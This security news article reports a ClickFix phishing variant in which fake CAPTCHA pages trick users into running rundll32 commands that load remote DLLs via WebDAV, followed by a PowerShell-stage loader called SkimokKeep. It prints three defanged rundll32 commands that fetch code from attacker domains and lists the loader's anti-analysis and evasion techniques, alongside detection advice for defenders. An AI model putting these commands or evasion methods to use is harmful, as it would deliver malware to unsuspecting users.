ClickFix Evades PowerShell Detection via Rundll32 and WebDAV

A new ClickFix attack variant has been identified that evades detection by shifting execution away from PowerShell and mshta towards native Windows tools like rundll32.exe and WebDAV mini-redirector.

This evolution allows attackers to bypass traditional script-based detection, increasing the stealthy success rate of compromises.

The attack begins with phishing, directing users to a fake CAPTCHA page like healthybyhillary[.]com. The CyberProof Threat Research Team observed this new variant, where attackers manipulate users via the Win + R shortcut to execute malicious commands on their own device.

Phishing Website (Source : CyberProof).
Phishing Website (Source : CyberProof).

This trick convinces users to paste and run commands like:

  • rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  • rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  • rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.

These commands leverage the WebDAV mini-redirector (syntax \server@port) to access remote HTTP-hosted DLLs as local network shares.

ClickFix Execution via Rundll32 and WebDAV (Source : CyberProof).
ClickFix Execution via Rundll32 and WebDAV (Source : CyberProof).

Rundll32 executes the exported function #1 from the downloaded “verification.google” DLL in memory, hindering analysis.

Multi-Stage Infection Chain

Post-execution, rundll32 retrieves the malicious DLL and PowerShell executes additional payloads (e.g., Invoke-Expression, Net.WebClient.DownloadString) using flags like -NoP and -NonI. This initiates the SkimokKeep loader, a memory-resident payload.

PowerShell Execution of SkimokKeep Payload (Source : CyberProof).
PowerShell Execution of SkimokKeep Payload (Source : CyberProof).

SkimokKeep evades detection through:

  • Dynamic API resolution via DJB2 hashing.
  • In-memory execution, avoiding disk writes.
  • Process injection and memory modification.
  • Anti-VM/Sandbox checks (screen resolution, desktop presence, user interaction, system time, locale/versions).
  • Anti-debugging (GetTickCount timing checks, PID/THPID logic manipulation).

Detection Opportunities

Detection is possible via:

  • rundll32.exe execution with WebDAV syntax (@80) or davclnt.dll.
  • Outbound HTTP connections from rundll32.exe.
  • Suspicious rundll32 CLI patterns.
  • Follow-up PowerShell/mshta activity.
  • Connections to suspicious domains.

Network hunting queries for abnormal rundll32 WebDAV paths (e.g., KQL examples) are effective.

Hunting Query Hits (Source : CyberProof).
Hits for the hunting query (Source : CyberProof).

This variant underscores attackers’ shift to fileless, user-driven “LOLbin” (living off the land binaries) attacks, bypassing script-based defenses.

Strengthening visibility into LOLbin abuse, command-line execution, and network behavior is critical to detecting evolving threats.

Related Articles

Back to top button